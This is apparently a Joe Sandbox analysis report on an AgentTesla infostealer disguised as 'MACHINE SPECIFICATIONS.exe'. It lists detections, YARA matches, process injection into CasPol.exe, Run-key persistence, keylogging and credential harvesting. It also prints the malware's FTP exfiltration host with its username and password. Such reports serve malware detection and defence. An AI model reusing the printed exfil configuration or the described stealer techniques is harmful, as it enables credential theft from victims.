Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
MACHINE SPECIFICATIONS.exe

Overview

General Information

Sample Name:MACHINE SPECIFICATIONS.exe
Analysis ID:755960
MD5:92945d0a2731ef771ea9d10c792e03e1
SHA1:1eeef600b7b51ce7aa93e825be55b40f3ef8e319
SHA256:46b61250c34b38d26ac5897217e6b70a222ff16318161c4e67c74c74491cc612
Tags:exe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
.NET source code references suspicious native API functions
Machine Learning detection for sample
May check the online IP address of the machine
Injects a PE file into a foreign processes
.NET source code contains very large array initializations
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Drops PE files
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Creates a window with clipboard capturing capabilities
Uses FTP
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • MACHINE SPECIFICATIONS.exe (PID: 6128 cmdline: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe MD5: 92945D0A2731EF771EA9D10C792E03E1)
    • CasPol.exe (PID: 688 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe MD5: F866FC1C2E928779C7119353C3091F0C)
  • newapp.exe (PID: 4272 cmdline: "C:\Users\user\AppData\Roaming\newapp\newapp.exe" MD5: F866FC1C2E928779C7119353C3091F0C)
    • conhost.exe (PID: 4764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • newapp.exe (PID: 676 cmdline: "C:\Users\user\AppData\Roaming\newapp\newapp.exe" MD5: F866FC1C2E928779C7119353C3091F0C)
    • conhost.exe (PID: 6132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
{"Exfil Mode": "FTP", "FTP Host": "ftp://ftp.electrobist.com", "Username": "user1@electrobist.com", "Password": "w&oNc9e]pf~4"}
SourceRuleDescriptionAuthorStrings
0000000A.00000000.345984518.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    0000000A.00000000.345984518.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      0000000A.00000000.345984518.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_AgentTesla_d3ac2b2funknownunknown
      • 0x31fc8:$a13: get_DnsResolver
      • 0x306b2:$a20: get_LastAccessed
      • 0x329f6:$a27: set_InternalServerPort
      • 0x32d2b:$a30: set_GuidMasterKey
      • 0x307c4:$a33: get_Clipboard
      • 0x307d2:$a34: get_Keyboard
      • 0x31bae:$a35: get_ShiftKeyDown
      • 0x31bbf:$a36: get_AltKeyDown
      • 0x307df:$a37: get_Password
      • 0x31303:$a38: get_PasswordHash
      • 0x3242a:$a39: get_DefaultCredentials
      0000000A.00000002.767841057.0000000002881000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        0000000A.00000002.768390327.00000000028D4000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          Click to see the 4 entries
          SourceRuleDescriptionAuthorStrings
          10.0.CasPol.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            10.0.CasPol.exe.400000.0.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
              10.0.CasPol.exe.400000.0.unpackMALWARE_Win_AgentTeslaV3AgentTeslaV3 infostealer payloadditekSHen
              • 0x34d04:$s10: logins
              • 0x3477e:$s11: credential
              • 0x309c4:$g1: get_Clipboard
              • 0x309d2:$g2: get_Keyboard
              • 0x309df:$g3: get_Password
              • 0x31d9e:$g4: get_CtrlKeyDown
              • 0x31dae:$g5: get_ShiftKeyDown
              • 0x31dbf:$g6: get_AltKeyDown
              10.0.CasPol.exe.400000.0.unpackWindows_Trojan_AgentTesla_d3ac2b2funknownunknown
              • 0x321c8:$a13: get_DnsResolver
              • 0x308b2:$a20: get_LastAccessed
              • 0x32bf6:$a27: set_InternalServerPort
              • 0x32f2b:$a30: set_GuidMasterKey
              • 0x309c4:$a33: get_Clipboard
              • 0x309d2:$a34: get_Keyboard
              • 0x31dae:$a35: get_ShiftKeyDown
              • 0x31dbf:$a36: get_AltKeyDown
              • 0x309df:$a37: get_Password
              • 0x31503:$a38: get_PasswordHash
              • 0x3262a:$a39: get_DefaultCredentials
              No Sigma rule has matched
              Timestamp:192.168.2.351.195.62.16049702212029927 11/29/22-11:20:12.397759
              SID:2029927
              Source Port:49702
              Destination Port:21
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.351.195.62.16049703522592851779 11/29/22-11:20:12.420526
              SID:2851779
              Source Port:49703
              Destination Port:52259
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: MACHINE SPECIFICATIONS.exeVirustotal: Detection: 58%Perma Link
              Source: MACHINE SPECIFICATIONS.exeReversingLabs: Detection: 73%
              Source: http://ftp.electrobist.comAvira URL Cloud: Label: malware
              Source: MACHINE SPECIFICATIONS.exeJoe Sandbox ML: detected
              Source: 10.0.CasPol.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
              Source: 10.0.CasPol.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "FTP Host": "ftp://ftp.electrobist.com", "Username": "user1@electrobist.com", "Password": "w&oNc9e]pf~4"}
              Source: unknownHTTPS traffic detected: 3.220.57.224:443 -> 192.168.2.3:49701 version: TLS 1.2
              Source: MACHINE SPECIFICATIONS.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: caspol.pdbdv source: CasPol.exe, 0000000A.00000003.399059752.00000000059A9000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000B.00000000.387084223.0000000000802000.00000002.00000001.01000000.00000007.sdmp, newapp.exe.10.dr
              Source: Binary string: caspol.pdb source: CasPol.exe, 0000000A.00000003.399059752.00000000059A9000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000B.00000000.387084223.0000000000802000.00000002.00000001.01000000.00000007.sdmp, newapp.exe.10.dr
              Source: Binary string: C:\Users\Memm\Downloads\JesusIsTheLord\obj\Debug\Meme.pdb source: MACHINE SPECIFICATIONS.exe

              Networking

              barindex
              Source: TrafficSnort IDS: 2029927 ET TROJAN AgentTesla Exfil via FTP 192.168.2.3:49702 -> 51.195.62.160:21
              Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.3:49703 -> 51.195.62.160:52259
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDNS query: name: api.ipify.org
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDNS query: name: api.ipify.org
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDNS query: name: api.ipify.org
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDNS query: name: api.ipify.org
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDNS query: name: api.ipify.org
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDNS query: name: api.ipify.org
              Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewIP Address: 51.195.62.160 51.195.62.160
              Source: Joe Sandbox ViewIP Address: 3.220.57.224 3.220.57.224
              Source: Joe Sandbox ViewIP Address: 3.220.57.224 3.220.57.224
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Host: api.ipify.orgConnection: Keep-Alive
              Source: global trafficTCP traffic: 192.168.2.3:49703 -> 51.195.62.160:52259
              Source: unknownFTP traffic detected: 51.195.62.160:21 -> 192.168.2.3:49702 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 15:20. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 15:20. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 15:20. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 15:20. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
              Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
              Source: CasPol.exe, 0000000A.00000002.767841057.0000000002881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
              Source: CasPol.exe, 0000000A.00000002.767841057.0000000002881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
              Source: CasPol.exe, 0000000A.00000003.409423403.000000000592A000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000002.779812564.000000000592A000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000003.399211019.000000000590A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: CasPol.exe, 0000000A.00000002.772635350.0000000002B66000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000002.772655142.0000000002B6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.electrobist.com
              Source: CasPol.exe, 0000000A.00000002.767841057.0000000002881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: CasPol.exe, 0000000A.00000002.767841057.0000000002881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xgrPBN.com
              Source: CasPol.exe, 0000000A.00000002.767841057.0000000002881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
              Source: CasPol.exe, 0000000A.00000002.767841057.0000000002881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
              Source: CasPol.exe, 0000000A.00000002.767841057.0000000002881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgftp://ftp.electrobist.comuser1
              Source: CasPol.exe, 0000000A.00000002.768390327.00000000028D4000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000002.772635350.0000000002B66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://eyUBHCqVhczCNfHAY6U.org
              Source: CasPol.exe, 0000000A.00000002.767841057.0000000002881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
              Source: unknownDNS traffic detected: queries for: api.ipify.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Host: api.ipify.orgConnection: Keep-Alive
              Source: unknownHTTPS traffic detected: 3.220.57.224:443 -> 192.168.2.3:49701 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow created: window name: CLIPBRDWNDCLASS

              System Summary

              barindex
              Source: 10.0.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
              Source: 10.0.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
              Source: 0000000A.00000000.345984518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
              Source: Process Memory Space: CasPol.exe PID: 688, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
              Source: 10.0.CasPol.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b209BAEF0u002dB9D1u002d4EDCu002d916Au002d070C59DE070Au007d/E2113872u002d1804u002d41A9u002d8E9Fu002d0420E9801409.csLarge array initialization: .cctor: array initializer size 11016
              Source: 10.0.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
              Source: 10.0.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
              Source: 0000000A.00000000.345984518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
              Source: Process Memory Space: CasPol.exe PID: 688, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_023FFC48
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_023F6D20
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_05DF9708
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_05DFF2A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_05DFBE50
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_05DFB4E0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_05DF84B8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_05DF8408
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_05DFD9A8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_05E90480
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_05E92170
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_05E9BC40
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_05E95F40
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_05E929C8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_05E92020
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_05E9CA68
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_05EE3D4C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_05EE372C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_05EE5668
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_05EEC1E0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_05EE0040
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_05EEC054
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_05EE33E4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_05EED3A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_05EE8B28
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_05EE3730
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_05E93958
              Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 11_2_01130958
              Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 13_2_00C00958
              Source: MACHINE SPECIFICATIONS.exeStatic PE information: No import functions for PE file found
              Source: MACHINE SPECIFICATIONS.exeBinary or memory string: OriginalFilenameMeme.exe4 vs MACHINE SPECIFICATIONS.exe
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\newapp\newapp.exe 67F3FC243C58EEAE55BDDC22CE025B7841A89ACA2E201B999D8C0E4F07D177B8
              Source: MACHINE SPECIFICATIONS.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: MACHINE SPECIFICATIONS.exeVirustotal: Detection: 58%
              Source: MACHINE SPECIFICATIONS.exeReversingLabs: Detection: 73%
              Source: MACHINE SPECIFICATIONS.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: unknownProcess created: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"
              Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"
              Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\MACHINE SPECIFICATIONS.exe.logJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile created: C:\Users\user\AppData\Local\Temp\tmpA418.tmpJump to behavior
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@3/3
              Source: newapp.exe.10.dr, Microsoft.Tools.Caspol/caspol.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
              Source: newapp.exe.10.dr, Microsoft.Tools.Caspol/caspol.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 11.0.newapp.exe.800000.0.unpack, Microsoft.Tools.Caspol/caspol.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
              Source: 11.0.newapp.exe.800000.0.unpack, Microsoft.Tools.Caspol/caspol.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4764:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6132:120:WilError_01
              Source: MACHINE SPECIFICATIONS.exe, C6ean/Ough6.csCryptographic APIs: 'CreateDecryptor'
              Source: 10.0.CasPol.exe.400000.0.unpack, A/f2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
              Source: 10.0.CasPol.exe.400000.0.unpack, A/f2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
              Source: MACHINE SPECIFICATIONS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: MACHINE SPECIFICATIONS.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: MACHINE SPECIFICATIONS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: caspol.pdbdv source: CasPol.exe, 0000000A.00000003.399059752.00000000059A9000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000B.00000000.387084223.0000000000802000.00000002.00000001.01000000.00000007.sdmp, newapp.exe.10.dr
              Source: Binary string: caspol.pdb source: CasPol.exe, 0000000A.00000003.399059752.00000000059A9000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000B.00000000.387084223.0000000000802000.00000002.00000001.01000000.00000007.sdmp, newapp.exe.10.dr
              Source: Binary string: C:\Users\Memm\Downloads\JesusIsTheLord\obj\Debug\Meme.pdb source: MACHINE SPECIFICATIONS.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_05DFE6F9 pushfd ; ret
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_05DF9C29 push 550241CFh; iretd
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_05DF2A47 push edi; retn 0000h
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_05E9517B push esp; ret
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_05E9517B pushad ; ret
              Source: initial sampleStatic PE information: section name: .text entropy: 7.996815914318105
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile created: C:\Users\user\AppData\Roaming\newapp\newapp.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run newappJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run newappJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (67).png
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\newapp\newapp.exe:Zone.Identifier read attributes | delete
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
